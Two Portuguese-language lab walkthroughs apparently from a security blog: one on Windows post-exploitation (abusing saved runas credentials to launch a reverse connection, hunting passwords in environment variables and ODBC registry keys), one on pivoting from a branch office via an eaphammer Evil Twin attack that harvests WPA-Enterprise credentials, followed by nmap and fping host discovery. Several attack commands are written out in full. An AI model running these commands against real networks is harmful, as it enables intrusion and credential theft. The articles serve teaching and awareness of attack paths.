PÓS-EXPLORAÇÃO EM SISTEMAS WINDOWS

Neste artigo, iremos ver alguns meios de como realizar a pós-exploração ao ganhar acesso a uma máquina Windows.

O uso de ferramentas que automatizam a pós-exploração veem aumentando, como por exemplo, o uso do Mimikatz.

Entretanto, é possível realizar o bloqueio / detecção dessas ferramentas.

Portanto, eu separei de forma lógica, ao decorrer da minha carreira e dos meus estudos, alguns comandos que me ajudaram a realizar a pós-exploração em sistemas Windows.

Em meu lab, possuí um usuário chamado Carlos Silva (hackware.local\carlos.silva). Iremos trabalhar com o acesso a maquina dele.

Procurando arquivos .bat, .vbs e .ps1

Normalmente, esses arquivos são criados pela equipe do Suporte Técnico afim de automatizar alguma tarefa nas maquinas dos usuários. Para realizar essa busca, podemos utilizar o seguinte comando: 

C:\Users\carlos.silva\ > dir *.bat *.vbs *.ps1 /s

Esse comando realiza a busca dos arquivos com formatos bat, vbs e ps1 no diretório atual e nas subpastas presentes.

A saída do comando nos retornou dois arquivos:

• CollectSyncLogs.bat, proprietário do OneDrive.
• run.bat, vamos analisar. 

Podemos utilizar o comando more para visualizar o conteúdo dentro do arquivo run.bat:

Vamos entender o conteúdo do arquivo run.bat:

Podemos deduzir então, de forma clara, que o usuário pedro.bastos invoca o executável contabil.exe sem a necessidade de inserir a senha, pois já esta salva. Com isso, podemos executar o seguinte comando:

Como podemos ver, dessa vez o runas executa o arquivo pivoting.exe, que tem como objetivo estabelecer uma conexão reversa com a minha maquina (atacante). Resultado após executar o arquivo:

Dica: para visualizar as credenciais atualmente armazenadas, basta utilizar o comando cmdkey /list:

Variáveis de ambiente

Outro meio para se conseguir credenciais é checando as variáveis de ambiente presentes no sistema. Para encontrar variáveis que podem possuir senhas / logins, eu utilizo um comando para automatizar a busca. Esse comando lê um arquivo onde contem algumas palavras chaves, como por exemplo password, senha.  Vejamos a seguir: 

OBDC (Open Database Connectivity)

Sendo bastante utilizado para o acesso a sistemas gerenciadores de bancos de dados, muitas das vezes a configuração não é criptografada ao ser salva no Registros do Windows. Podemos explorar essa falha de segurança utilizando o seguinte comando a seguir: 

Comando utilizado no Powershell.

Entendendo o comando: 

• User DSN: HKEY_CURRENT_USER-> Software -> ODBC -> ODBC.INI -> DSNNAME
• System DSN: HKEY_LOCAL_MACHINE-> Software -> ODBC -> ODBC.INI -> DSNNAME

Conclusão

Conforme dito no inicio do artigo, o uso de ferramentas que automatizam a pós-exploração veem aumentando, mas estão cada vez mais difíceis de serem utilizadas em ambientes que possuem uma segurança mais rigorosa. O uso de comandos também estão cada vez mais sendo detectados, principalmente com o uso de Machine Learning.

Referenciais 

• Encrypting Passwords on ODBC DSN
• Windows - Privilege Escalation
• Cmdkey, Runas, Get-Item, Net User

PIVOTING: DA FILIAL PARA MATRIZ

Com o objetivo de mostrar a importância da segurança da informação em filiais, neste artigo irei abordar os seguintes tópicos:

• Ataques wireless;
• Descoberta de sub redes;
• Descoberta de hosts;
• Descoberta de serviços;

Para comprometer a infraestrutura de uma empresa, muitas das vezes os ataques cibernéticos tem como alvo as filiais, para realização de pivoting até a matriz.

Essa será a infraestrutura do lab demonstrando uma empresa:

• Dois firewalls fechando uma VPN site-to-site (filial <--> matriz);
• Usuário (filial) com notebook conectado em um roteador wireless;
• Um servidor (genérico) na matriz;

Acessando a rede da filial

O primeiro passo é conseguir acessar a rede da filial. Para isso, irei analisar a rede:

Tive como resultado os seguintes detalhes:

• SSID: Contoso
• Segurança: WPA & WPA2 Enterprise
• Autenticação: Radius

A rede wireless está configurada com um protocolo de segurança WPA & WPA2 Enterprise que funciona via servidor Radius. 

Sabendo disso, irei fazer um ataque do tipo Evil Twin com foco em redes wireless Enterprise.

Clonando o repositório da ferramenta de ataque eaphammer

$ : git clone https://github.com/s0lst1c3/eaphammer/

• Distro Kali: cd eaphammer/ && ./kali-setup
• Outras distros: https://github.com/s0lst1c3/eaphammer/wiki/Setup-Guide#i-kali-setup-instructions 

Pegando o BSSID da rede alvo

# Iniciando a placa de rede wifi em modo monitoramento 
$ : airmon-ng start wlan0

# Capturando redes wireless 5Ghz 
$ : airodump-ng wlan0mon -b a

Gerando certificado para rede alvo e realizando o ataque

# Gerando certificado com informações da empresa
$ : ./eaphammer --cert-wizard

 

# Criando AP falso
$ : ./eaphammer --bssid B0:BE:76:0E:E5:D8 --essid Contoso --channel 6 --auth wpa-eap --interface wlan0 --creds

 

Os clientes começarão a se desconectar da rede de destino e a se conectar ao meu AP.

Ao inserir as credenciais solicitadas e tentarem se conectar, os dados serão enviados para o atacante.

Acessando a rede e realizando descoberta de sub redes, hosts e serviços

Com acesso a rede, o objetivo agora é encontrar alguma rota para rede da matriz. Para conseguir isso, irei utilizar uma ferramenta chamada netdiscover, que tem como sua principal função a análise de rotas.

$ : netdiscover -L

Outros meios para se fazer a descoberta sub redes e hosts é utilizando o nmap ou fping:

$ : nmap -sP 172.16.0.0/24

$ : fping -s -g 172.16.0.1 172.16.0.50

Ao comprometer um dispositivo, também é possível realizar a descoberta de hosts consultando o arquivo hosts do sistema operacional:

Windows: System32\drivers\etc\hosts

Linux: /etc/hosts

MAC OS: /private/etc/hosts

 

Conclusão

Conforme vimos no decorrer do artigo, com um simples acesso a rede da filial é possível escalarmos até a rede da matriz. Segurança da informação é composta por pessoas, processos e tecnologias, ou seja, não basta comprar aquele firewall, SIEM, IPS ou antivírus de última geração se a estratégia de implementação, ciclo de vida, sustentação e resposta a incidentes não forem capazes de acompanhar a evolução de ameaças nos dias de hoje.